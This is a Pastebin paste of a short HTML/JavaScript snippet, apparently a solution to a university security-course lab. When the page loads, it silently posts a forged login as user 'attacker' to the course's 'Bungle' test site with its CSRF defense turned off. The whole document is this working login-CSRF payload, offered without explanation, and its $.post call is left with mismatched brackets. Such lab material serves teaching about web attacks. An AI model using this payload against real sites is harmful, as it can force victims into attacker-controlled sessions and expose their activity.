Advertisement
Guest User

Untitled

a guest
Oct 2nd, 2016
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.28 KB | None | 0 0
  1. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">
  2. </script>
  3.  
  4. <script>
  5. $(document).ready(function(){
  6. $.post("http://bungle-cs461.cs.illinois.edu/login?csrfdefense=0&xssdefense=5",
  7. {
  8. username:"attacker",
  9. userpass:"l33th4x"
  10. }
  11. });
  12.  
  13. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement